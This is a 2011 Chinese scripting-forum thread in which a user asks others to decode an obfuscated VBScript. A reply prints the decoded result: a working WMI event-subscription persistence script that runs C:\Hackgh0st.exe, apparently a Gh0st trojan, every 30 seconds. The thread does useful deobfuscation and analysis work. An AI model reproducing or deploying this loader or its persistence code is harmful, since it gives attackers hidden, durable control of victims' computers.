批处理之家 - Powered by Discuz! Board

标题: [问题求助] 帮手解密一个vbs代码 [打印本页]

作者: zinet 时间: 2011-8-4 10:10 标题: 帮手解密一个vbs代码

代码如下：
ssss="qdzddeadzrdwzdzvrccrrrdzdrrrrdxrrurrudaxdzvrccrdarcrrrcrrzrcwduwdevrcrrdxrdvrcwrdxdxardurrwrdxrdarcwdvedvrdzvrccrdarcrrrcrrzrcwduwdzdrrrrdxrrurrudvrdvxdcddredzddeadzrdwzdzvrccrrrdzdrcxrccdearrercudaxdzvrccrrrdzdrrrrdxrrurruduwdearrercurrcrcrrrxrrerrardxrrercwdvedvrdxercrrrxrdardxrccrccdvrdvxdwzdcddrerccrcxrccrderrcrcrdwzdaxdwzdzvrccrrrdzdrcxrccdearrercuduwdxdrcwrdxrradvedvrdzddzadzddzrdeadxvdxzdxadxadzrdvrdvxdwzdcddrerccrcxrccrderrcrcrduedwzdaxdwzrrarrcrdedverccrcxrccrderrcrcrdurduadurduxdvxdcddrerrerccrrurrcrrerrvdaxdvrrcarrcrrerrarrdrrarcwrccdaudzzdzzduwdzzrcrrrxrrxrcwdzzrccrcvrdurccrdarcrrrcrrzrcwrrcrrxrredaudvrdcddrerderrxrrxrcrrrerdvrrardxdaxdvrrrarccrrxrdxrdarrwdvrdcddrercrrcvrrerrcrrercwrdxrcrrcurdvrrudwzdaxdwzduxduuduuduuduudcddrerccrcwrcercwdaxdvrdzdrdxrcwdwzrrxrdurrwdzdrrrrdxrrurrudwzdaxdwzdevrcrrdxrdvrcwrdxdxardurrwrdxrdarcwdvedvrdvrdzvrccrdarcrrrcrrzrcwduwdzdrrrrdxrrurrudvrdvrdvxdaurrxrdurrwdzdrrrrdxrrurruduwdxzrcvrredwzdvrdvrdevdaudzzdzzdezrdvrdarrvrrdrrrduurccrcwduwrdxrcerdxdvrdvrdvrdcddredzddeadzrdwzrdvrccrdxrdadaxrrdrdxrcwrrxrdurrwrdxrdarcwdverrerccrrurrcrrerrvdvudvrdecrdarcwrrcrcurdxdzdrdarcrrrcrrzrcwdearcurdxrrercwdevrrxrrerccrcvrrardxrcrdvrdvxduwrccrrzrdvrcarrerrcrrerccrcwrdvrrerdardxrdcdcddrerdvrccrdxrdaduwrrerdvrrardxdaxrdarrxrrerccrcvrrardxrcrrdcrderrxrrudcddrerdvrccrdxrdaduwrccrdarcrrrcrrzrcwrrcrrerrdrdxrrerrdrrcrrerdxdaxdvrrcurdurccrdarcrrrcrrzrcwdvrdcddrerdvrccrdxrdaduwrccrdarcrrrcrrzrcwrcwrdxrcercwdaxrccrcwrcercwdcddredzddeadzrdwzrdvrccrdxrdarrzrdvrcwrrrdaxrdvrccrdxrdaduwrrzrcvrcwrdcdcddredzddeadzrdwzrrcrcwrrcrrardxrcrdaxrrdrdxrcwrrxrdurrwrdxrdarcwdverrerccrrurrcrrerrvdvudvrrdcrdcdxdrrercwrdxrcrrcurdvrrudzrrrcrrardxrcrdxdrrerccrcwrcrrcvrdarcwrrcrrxrredvrdvxduwrccrrzrdvrcarrerrcrrerccrcwrdvrrerdardxrdcdcddrerrcrcwrrcrrardxrcrduwrcwrrcrrardxrcrrrcrdedaxrderrxrrxrcrrrerdvrrardxdvudvrrdcrrcrcwrrcrrardxrcrdvrdcddrerrcrcwrrcrrardxrcrduwrrcrrercwrdxrcrrcurdvrrurdurdxrcwrcardxrdxrrerdxrcurdxrrercwrccdaxrcrrcvrrerrcrrercwrdxrcrrcurdvrrudcddrerrcrcwrrcrrardxrcrduwrccrrvrrcrrzrrcrdzrrzrdvrccrccrdxrdedaxrdzrdvrrurccrdxdcddrerrcrcwrrcrrardxrcrduwrrzrcvrcwrdcdcddredzddeadzrdwzrdxrcurcwrdzrrurcwdaxrrdrdxrcwrrxrdurrwrdxrdarcwdverrerccrrurrcrrerrvdvudvrrdcrdcdearcurdxrrercwdeerrcrrurcwrdxrcrdvrdvxduwrccrrzrdvrcarrerrcrrerccrcwrdvrrerdardxrdcdcddrerdxrcurcwrdzrrurcwduwrrerdvrrardxdaxrdzrrcrrurcwrdxrcrrdcrrdrdzrrudcddrerdxrcurcwrdzrrurcwduwrcdrcvrdxrcrrcxdaxdvrrccrdxrrurdxrdarcwdwzdvzdwzrdzrcrrrxrradwzrdcrdcrcwrrcrrardxrcrrdxrcurdxrrercwdwzrcarrrrdxrcrrdxdwzrcwrrcrrardxrcrrrcrdedaxdvrdvrdvrdvurderrxrrxrcrrrerdvrrardxdvudvrrdcrrcrcwrrcrrardxrcrdvrdvrdvrdcddrerdxrcurcwrdzrrurcwduwrcdrcvrdxrcrrcxrrurdvrrerrdrcvrdvrrdrdxdaxdvrrcarcdrrudvrdcddredzddeadzrdwzrdzrrurcwrrzrdvrcwrrrdaxrdxrcurcwrdzrrurcwduwrrzrcvrcwrdcdcddredzddeadzrdwzrdzrdardurrerdedaxrrdrdxrcwrrxrdurrwrdxrdarcwdverrerccrrurrcrrerrvdvudvrrdcrdcdeerrcrrurcwrdxrcrdzrrrxdevrrxrrerccrcvrrardxrcrdewrrcrrerderrcrrerrddvrdvxduwrccrrzrdvrcarrerrcrrerccrcwrdvrrerdardxrdcdcddrerdzrdardurrerdeduwrdarrxrrerccrcvrrardxrcrdaxrdvrccrdxrdarrzrdvrcwrrrduwrrzrdvrcwrrrdcddrerdzrdardurrerdeduwrdzrrcrrurcwrdxrcrdaxrdzrrurcwrrzrdvrcwrrrduwrrzrdvrcwrrrdcddrerdzrdardurrerdeduwrrzrcvrcwrdcdcddrerrcrrercwdwzdavdueduedavdueduadcddre"
execute chr(114)&chr(100)&chr(120)&chr(61)&chr(109)&chr(105)&chr(100)&chr(40)&chr(115)&chr(115)&chr(115)&chr(115)&chr(44)&chr(49)&chr(44)&chr(49)&chr(41)&chr(13)&chr(10)&chr(114)&chr(100)&chr(61)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(100)&chr(120)&chr(44)&chr(34)&chr(100)&chr(34)&chr(44)&chr(34)&chr(48)&chr(34)&chr(41)&chr(44)&chr(34)&chr(97)&chr(34)&chr(44)&chr(34)&chr(49)&chr(34)&chr(41)&chr(44)&chr(34)&chr(99)&chr(34)&chr(44)&chr(34)&chr(50)&chr(34)&chr(41)&chr(44)&chr(34)&chr(98)&chr(34)&chr(44)&chr(34)&chr(51)&chr(34)&chr(41)&chr(44)&chr(34)&chr(119)&chr(34)&chr(44)&chr(34)&chr(52)&chr(34)&chr(41)&chr(44)&chr(34)&chr(122)&chr(34)&chr(44)&chr(34)&chr(53)&chr(34)&chr(41)&chr(44)&chr(34)&chr(104)&chr(34)&chr(44)&chr(34)&chr(54)&chr(34)&chr(41)&chr(44)&chr(34)&chr(113)&chr(34)&chr(44)&chr(34)&chr(55)&chr(34)&chr(41)&chr(44)&chr(34)&chr(114)&chr(34)&chr(44)&chr(34)&chr(56)&chr(34)&chr(41)&chr(44)&chr(34)&chr(116)&chr(34)&chr(44)&chr(34)&chr(57)&chr(34)&chr(41)&chr(13)&chr(10)&chr(115)&chr(115)&chr(115)&chr(115)&chr(61)&chr(109)&chr(105)&chr(100)&chr(40)&chr(115)&chr(115)&chr(115)&chr(115)&chr(44)&chr(50)&chr(41)&chr(13)&chr(10)&chr(115)&chr(115)&chr(115)&chr(115)&chr(61)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(114)&chr(101)&chr(112)&chr(108)&chr(97)&chr(99)&chr(101)&chr(40)&chr(115)&chr(115)&chr(115)&chr(115)&chr(44)&chr(34)&chr(100)&chr(34)&chr(44)&chr(34)&chr(48)&chr(34)&chr(41)&chr(44)&chr(34)&chr(114)&chr(34)&chr(44)&chr(34)&chr(49)&chr(34)&chr(41)&chr(44)&chr(34)&chr(99)&chr(34)&chr(44)&chr(34)&chr(50)&chr(34)&chr(41)&chr(44)&chr(34)&chr(119)&chr(34)&chr(44)&chr(34)&chr(51)&chr(34)&chr(41)&chr(44)&chr(34)&chr(118)&chr(34)&chr(44)&chr(34)&chr(52)&chr(34)&chr(41)&chr(44)&chr(34)&chr(117)&chr(34)&chr(44)&chr(34)&chr(53)&chr(34)&chr(41)&chr(44)&chr(34)&chr(97)&chr(34)&chr(44)&chr(34)&chr(54)&chr(34)&chr(41)&chr(44)&chr(34)&chr(101)&chr(34)&chr(44)&chr(34)&chr(55)&chr(34)&chr(41)&chr(44)&chr(34)&chr(120)&chr(34)&chr(44)&chr(34)&chr(56)&chr(34)&chr(41)&chr(44)&chr(34)&chr(122)&chr(34)&chr(44)&chr(34)&chr(57)&chr(34)&chr(41)&chr(13)&chr(10)&chr(102)&chr(111)&chr(114)&chr(32)&chr(105)&chr(61)&chr(49)&chr(32)&chr(116)&chr(111)&chr(32)&chr(108)&chr(101)&chr(110)&chr(40)&chr(115)&chr(115)&chr(115)&chr(115)&chr(41)&chr(32)&chr(115)&chr(116)&chr(101)&chr(112)&chr(32)&chr(51)&chr(13)&chr(10)&chr(104)&chr(61)&chr(109)&chr(105)&chr(100)&chr(40)&chr(115)&chr(115)&chr(115)&chr(115)&chr(44)&chr(105)&chr(44)&chr(51)&chr(41)&chr(13)&chr(10)&chr(100)&chr(111)&chr(13)&chr(10)&chr(105)&chr(102)&chr(32)&chr(108)&chr(101)&chr(102)&chr(116)&chr(40)&chr(104)&chr(44)&chr(49)&chr(41)&chr(61)&chr(34)&chr(48)&chr(34)&chr(32)&chr(116)&chr(104)&chr(101)&chr(110)&chr(13)&chr(10)&chr(104)&chr(61)&chr(114)&chr(105)&chr(103)&chr(104)&chr(116)&chr(40)&chr(104)&chr(44)&chr(108)&chr(101)&chr(110)&chr(40)&chr(104)&chr(41)&chr(45)&chr(49)&chr(41)&chr(13)&chr(10)&chr(101)&chr(108)&chr(115)&chr(101)&chr(13)&chr(10)&chr(101)&chr(120)&chr(105)&chr(116)&chr(32)&chr(100)&chr(111)&chr(13)&chr(10)&chr(101)&chr(110)&chr(100)&chr(32)&chr(105)&chr(102)&chr(13)&chr(10)&chr(108)&chr(111)&chr(111)&chr(112)&chr(13)&chr(10)&chr(104)&chr(61)&chr(104)&chr(45)&chr(114)&chr(100)&chr(13)&chr(10)&chr(117)&chr(115)&chr(115)&chr(61)&chr(117)&chr(115)&chr(115)&chr(38)&chr(99)&chr(104)&chr(114)&chr(40)&chr(104)&chr(41)&chr(13)&chr(10)&chr(110)&chr(101)&chr(120)&chr(116)&chr(13)&chr(10)&chr(101)&chr(120)&chr(101)&chr(99)&chr(117)&chr(116)&chr(101)&chr(32)&chr(117)&chr(115)&chr(115)

请帮忙一下

作者: Batcher 时间: 2011-8-4 11:03

批处理解密破解已经加密的VBS
http://bbs.bathome.net/thread-3637-1-1.html

作者: broly 时间: 2011-8-4 11:41

最终要执行的代码

SET WshShell=Wscript.CreateObject("Wscript.Shell")
SET WshSysEnv=WshShell.Environment("Process") 
sysdir = WshSysEnv.Item("SYSTEMROOT") 
sysdir2 = mid(sysdir,1,3)
nslink="winmgmts:\\.\root\subscription:"
doorname="msoecj"
runinterval = 30000
stxt="Set objShell = CreateObject(""Wscript.Shell""):objShell.Run ""C:\\Hackgh0st.exe"""
SET asec=getobject(nslink&"ActiveScriptEventConsumer").spawninstance_
asec.name=consumer_dol
asec.scriptingengine="vbscript"
asec.scripttext=stxt
SET asecpath=asec.put_
SET itimer=getobject(nslink&"__IntervalTimerInstruction").spawninstance_
itimer.timerid=doorname&"_itimer"
itimer.intervalbetweenevents=runinterval
itimer.skipifpassed=false
itimer.put_
SET evtflt=getobject(nslink&"__EventFilter").spawninstance_
evtflt.name=filter_gfl
evtflt.query="select * from __timerevent where timerid="""&doorname&"_itimer"""
evtflt.querylanguage="wql"
SET fltpath=evtflt.put_
SET fcbnd=getobject(nslink&"__FilterToConsumerBinding").spawninstance_
fcbnd.consumer=asecpath.path
fcbnd.filter=fltpath.path
fcbnd.put_
int 922921
复制代码

欢迎光临批处理之家 (http://bathome.net./)

Powered by Discuz! 7.2